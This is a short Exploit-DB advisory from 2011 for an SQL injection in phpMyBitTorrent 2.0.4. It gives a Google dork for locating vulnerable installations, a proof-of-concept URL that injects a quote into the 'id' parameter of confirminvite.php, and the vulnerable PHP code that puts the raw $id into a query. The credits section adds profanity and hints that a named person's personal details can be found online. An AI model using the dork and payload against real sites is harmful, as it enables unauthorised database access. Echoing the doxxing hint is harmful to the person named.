phpMyBitTorrent 2.0.4 – SQL Injection

  • 作者: #forkbombers
    日期: 2011-02-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16170/
  • # Exploit Title: phpMyBitTorrent 2.0.4 SQL injection
    # Google Dork: inurl:"user.php?op=register"
    # Date: 14/FEB/2011
    # Author: #forkbombers@irc.smashthestack.org
    # Software Link: http://sourceforge.net/projects/phpmybittorrent/
    # Version: 2.0.4
    # Tested on: *nix
    
    ----------------------------------------------------------------------
    			[INFO]
    
    Sadly although the Google dork returns 36,000 results for this to work the invitation
    system needs to be enabled for this exploit to work. Fucking useless to me.
    
    ----------------------------------------------------------------------
    			[XPL]
    
    localhost/torrents/confirminvite.php?id=1'
    
    Error Executing SQL Query SELECT password, active FROM torrent_users WHERE id =
    
    ----------------------------------------------------------------------
    			[CODE]
    [code]
    $sql = "SELECT password, active FROM ".$db_prefix."_users WHERE id = $id";
    $res = $db->sql_query($sql) or btsqlerror($sql);
    $row = $db->sql_fetchrow($res);
    
    if (!$row)
    bterror(_bterrusernotexists,_btsorry);
    
    if ($row["active"] != '0') {
    OpenTable(_btsignup);
    echo "<p>"._btuseralreadyactive."</p>";
    CloseTable();
    include('footer.php')
    [/code]
    
    ----------------------------------------------------------------------
    			[CREDS]
    
    Thanks to Gumbie@irc.efnet.org for letting me use his box to test :)
    Fuck ak for being such a bitch (not really <3 u), btw his d0x are g00gleiz3d if you want to give him a call
    
    ----------------------------------------------------------------------